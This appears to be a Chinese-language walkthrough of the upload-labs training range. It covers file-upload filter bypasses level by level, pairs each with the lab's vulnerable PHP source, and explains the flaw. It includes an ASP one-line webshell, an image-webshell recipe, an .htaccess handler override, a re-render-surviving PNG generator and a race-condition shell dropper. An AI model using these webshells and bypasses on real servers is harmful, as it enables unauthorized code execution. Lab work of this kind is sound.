upload-labs通关详细教程

文章目录

  • 文件上传要点
  • 1、前端验证绕过
    • 做题步骤
    • 源码分析
  • 2、Content-Type方式绕过
    • 做题步骤
    • 源码分析
  • 3、黑名单绕过
    • 做题步骤
    • 源码分析
  • 4、.htaccess文件绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 5、后缀大小写绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 6、文件后缀(空)绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 7、文件后缀(点)绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 8、::$DATA(Windows文件流绕过)
    • 简介
    • 做题步骤
    • 源码分析
  • 9、构造文件后缀绕过
    • 做题步骤
    • 源码分析
  • 10、双写文件后缀绕过
    • 做题步骤
    • 源码分析
  • 11、%00截断绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 12、%00截断绕过(二)
    • 做题步骤
    • 源码分析
  • 13-15、图片马绕过
    • 做题步骤
    • 源码分析
  • 16、二次渲染绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 17-18、条件竞争绕过
    • 简介
    • 做题步骤
    • 源码分析
  • 19、move_uploaded_file()截断
    • 做题步骤
    • 源码分析
  • 20、IIS6.0解析漏洞(一)
    • 做题步骤
    • 源码分析
  • 21、IIS6.0解析漏洞(二)
    • 做题步骤
    • 源码分析
  • 22、IIS6.0解析漏洞(三)
    • 做题步骤
    • 源码分析
  • 23、CGI解析漏洞
    • 做题步骤
    • 源码分析

文件上传要点

  • 成因:没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。

  • 分类

    • 客户端检测:一般是在网页上写一段Js脚本,用Js去检测,校验上传文件的后缀名,有白名单也有黑名单。
      判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包,所以可以通过抓包来 判断,如果弹出不准上传,但是没有抓到数据包,那么就是前端验证

      前端验证非常不可靠,传正常文件改数据包就可以绕过,甚至关闭JS都可以尝试绕过

    • 服务端检测 常见的手段:
      检查Content-Type (内容类型)
      检查后缀 (检查后缀是主流)
      检查文件头

  • asp是一句话木马:<%eval request("asp")%>

  • php一句话木马:

  • 图片马制作:cmd copy 1.jpg/b + 1.php/a 2.jpg

  • 防御

    • 防护怎么加?(文件上传默认代码是没有防护的。)

      客户端检测:浏览器(JS) => 没有检测
      服务端检测:目标主机(后端代码)

    • 黑名单:不允许某某
      白名单:只允许某某

    • 防御方式
      后缀检测(最常见检测方式) 根据后缀来决定用什么东西处理这个文件
      Content-Type:
      .php => phtml php3 php4 php5
      .htaccess => 分布式配置文件
      windows 的文件和文件夹都不分大小写的
      windows 会自动去后缀末尾的空格
      windows 会自动去后缀末尾的点
      .php .php空格 => 末尾的空格会处理

1、前端验证绕过

文件名后缀设为php,文件类型设为图片类型

做题步骤

先上传一个php文件和正常的图片文件看一下回显

正确回显:
在这里插入图片描述

上传php文件回显:
upload-labs通关详细教程_第1张图片

弹窗提示,只能上传.jpg|.png|.gif类型的文件

构造图片马:

抓包修改文件名后缀为php

upload-labs通关详细教程_第2张图片

上传后右键新建标签页打开图像

upload-labs通关详细教程_第3张图片

可以看到文件路径,然后测试是否上传成功

upload-labs通关详细教程_第4张图片

连接蚁剑

upload-labs通关详细教程_第5张图片

拿到flag:zkaq{PpsG@-cImaU2cahL}

upload-labs通关详细教程_第6张图片

源码分析

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    //当文件为空时,提示选择文件
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    //截取到文件后缀名
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

getElementsBy() 方法可以返回指定名称的对象的集合。

substring(起始索引,结束索引) 返回字符串的子字符串。

lastIndexOf() 方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。

2、Content-Type方式绕过

做题步骤

upload-labs通关详细教程_第7张图片

upload-labs通关详细教程_第8张图片upload-labs通关详细教程_第9张图片upload-labs通关详细教程_第10张图片

拿到flag:zkaq{2jzVjQeRV_EfuA-+}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;

            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
    }
}

($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif'):说明上传的文件类型必须是jpeg、pbg、gif,就是数据包中的Content-Type
upload-labs通关详细教程_第11张图片

3、黑名单绕过

在过滤php,asp等后缀名时,可修改文件后缀名为phtml、php3、php4、php5进行绕过

做题步骤

按照前几关的步骤,上传gif图片马然后修改后缀名为PHP,有以下提示
upload-labs通关详细教程_第12张图片

不允许上传.asp,.aspx,.php,.jsp后缀文件!

尝试绕过,修改文件后缀名为phtml、php3、php4、php5

判断是否上传成功

upload-labs通关详细教程_第13张图片

蚁剑连接

upload-labs通关详细教程_第14张图片

拿到flag:zkaq{lapc=@Hs1EXxqwif}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
                 $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
                 $is_upload = true;
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

4、.htaccess文件绕过

简介

在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有禁用.htaccee那么就能触发getshell

.htaccess可以把.jpg解析成php

AddType application/x-httpd-php .jpg

做题步骤

先上传.htaccess文件:AddType application/x-httpd-php .gif

然后上传gif图片马

测试是否上传成功

upload-labs通关详细教程_第15张图片

蚁剑连接

upload-labs通关详细教程_第16张图片

拿到flag:zkaq{lgevqWqnexX2hy-a}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

代码把很多文件类型都过滤掉了

5、后缀大小写绕过

简介

strtolower($file_ext):函数会将所有字母转换为小写,在没有此功能,且很多后缀被ban的情况下,可以使用大小写绕过

做题步骤

上传gif图片马

抓包,修改后缀为Php

upload-labs通关详细教程_第17张图片

测试是否上传成功

upload-labs通关详细教程_第18张图片

连接蚁剑
upload-labs通关详细教程_第19张图片

拿到flag:zkaq{HBkYvhSTYnXLkY@1}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

这个题把几乎用得到的后缀名都过滤了,包括上一关利用的.htaccess文件,但是没有使用转换小写字母的函数,所以可以绕过

6、文件后缀(空)绕过

简介

trim($file_ext):该函数将字符串收尾去空,

在大小写绕不过,且没有使用此函数时,可使用后缀空绕过

做题步骤

上传gif图片马

抓包在后缀加个空格上传

upload-labs通关详细教程_第20张图片

测试是否上传成功

upload-labs通关详细教程_第21张图片

连接蚁剑

upload-labs通关详细教程_第22张图片

拿到flag:zkaq{fTHte#S@+5n1B+UF}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

$file_ext = strtolower($file_ext);这行代码过滤了大小写

7、文件后缀(点)绕过

简介

deldot($file_name)此函数删除了文件名末尾的点

做题步骤

上传gif图片马

抓包在后缀加几个点上传

upload-labs通关详细教程_第23张图片

upload-labs通关详细教程_第24张图片

拿到flag:zkaq{2hd2JY3@F7VNMY8W}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

$file_ext = trim($file_ext); //首尾去空:此行代码过滤了空格

8、::$DATA(Windows文件流绕过)

简介

str_ireplace('::$DATA', '', $file_ext);:去除字符串::$DATA

做题步骤

upload-labs通关详细教程_第25张图片

回显404

upload-labs通关详细教程_第26张图片

删除::$DATA
upload-labs通关详细教程_第27张图片

蚁剑连接

在这里插入图片描述

拿到flag:zkaq{n5zP@kZia7%dSPP1}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');

这两行代码过滤了点

但是少掉了过滤字符串::$DATA

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

9、构造文件后缀绕过

做题步骤

抓包修改后缀为php. . .

upload-labs通关详细教程_第28张图片

upload-labs通关详细教程_第29张图片

连接蚁剑

upload-labs通关详细教程_第30张图片

拿到flag:zkaq{1+U=Tl=%AKS-juZ5}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

可以构造后缀有多个空格和点来绕过

10、双写文件后缀绕过

做题步骤

抓包修改后缀名为pphphp

upload-labs通关详细教程_第31张图片

upload-labs通关详细教程_第32张图片

蚁剑连接
upload-labs通关详细教程_第33张图片

拿到flag:zkaq{7aYaRs8IN+9pP=rx}

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {
            $img_path = $UPLOAD_ADDR . '/' .$file_name;
            $is_upload = true;
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

$file_name = str_ireplace($deny_ext,"", $file_name);:此行代码表示当匹配到以上文件后缀时,用空格代替

11、%00截断绕过

简介

在url中%00表示ascll码中的0 ,0x00是十六进制表示方法,也是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。

做题步骤

抓包修改文件后缀,.php%00.gif,修改参数save_path=../upload/1.php%00
upload-labs通关详细教程_第34张图片

upload-labs通关详细教程_第35张图片

蚁剑连接

upload-labs通关详细教程_第36张图片

拿到flag:zkaq{E9JvKGkwMNLDpZRm}

源码分析

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = '上传失败!';
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1)检测后缀时被截断

12、%00截断绕过(二)

做题步骤

与第十一关不同的地方是,本关是post传参

抓包八宝村路径改成1.phpa

upload-labs通关详细教程_第37张图片

然后徐修改hex值,把a对应的地方修改为00

upload-labs通关详细教程_第38张图片

upload-labs通关详细教程_第39张图片

连接蚁剑

upload-labs通关详细教程_第40张图片

拿到flag:zkaq{hx5JQH@+OkI_5Fiv}

源码分析

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
        
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

13-15、图片马绕过

做题步骤

jpg图片马制作过程:

upload-labs通关详细教程_第41张图片

upload-labs通关详细教程_第42张图片

抓包改后缀名为php
upload-labs通关详细教程_第43张图片

png图片马制作:

在这里插入图片描述
upload-labs通关详细教程_第44张图片

upload-labs通关详细教程_第45张图片

gif文件也类似

源码分析

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
}

与第十四关、getimagesize图片类型绕过和第十五关、php_exif模块图片类型绕过步骤一样

16、二次渲染绕过

简介

原理:将一个正常显示的图片,上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分,将Webshell代码插在该部分,然后上传。具体实现需要自己编写Python程序,人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。

png:

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

使用gif格式的图片,一般hex前面首部部分不会改变,所以将一句话木马直接插入到没有改变的这部分

做题步骤

制作gif图片马
upload-labs通关详细教程_第46张图片

上传图片,下载下来后木马被删除,对比原来的图片马,在没有变化的位置添加一句话木马
在这里插入图片描述

继续上传,上传成功

upload-labs通关详细教程_第47张图片

连接蚁剑

upload-labs通关详细教程_第48张图片

upload-labs通关详细教程_第49张图片

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=$UPLOAD_ADDR.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagejpeg($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        }
        else
        {
            $msg = "上传失败!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagepng($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;               
            }
        }
        else
        {
            $msg = "上传失败!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagegif($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        }
        else
        {
            $msg = "上传失败!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

$im = imagecreatefrompng($target_path);:会使用上传的图片生成新的图片,此时会删除最后末尾的一句话木马

17-18、条件竞争绕过

简介

不断地上传文件不断地访问自己上传的文件,很有可能在文件进行判断删除之前,成功访问文件,并执行里面的代码

做题步骤

上传shell


$f=fopen("shell.php","w");
fputs($f,'');
?>

抓包使用intruder模块,不断上传文件

使用以下脚本访问shell.php文件

upload-labs通关详细教程_第50张图片

源码分析

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = $UPLOAD_ADDR . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传失败!';
    }
}

只允许上传.jpg|.png|.gif类型文件

strrpos($file_name,"."):寻找点最后一次出现的时间

$file_ext = substr($file_name,strrpos($file_name,".")+1);:输出后缀名

if(move_uploaded_file($temp_file, $upload_file)){ if(in_array($file_ext,$ext_arr)){这里先把文件移到到upload文件夹,再进行判断后缀名,如果后缀名不对就删除文件。

第十八关与第十七关一样

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload($UPLOAD_ADDR);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

19、move_uploaded_file()截断

做题步骤

抓包修改文件名
upload-labs通关详细教程_第51张图片

hex00截断

在这里插入图片描述

打开图片链接

upload-labs通关详细教程_第52张图片

修改url路径
upload-labs通关详细教程_第53张图片

注入成功

连接蚁剑

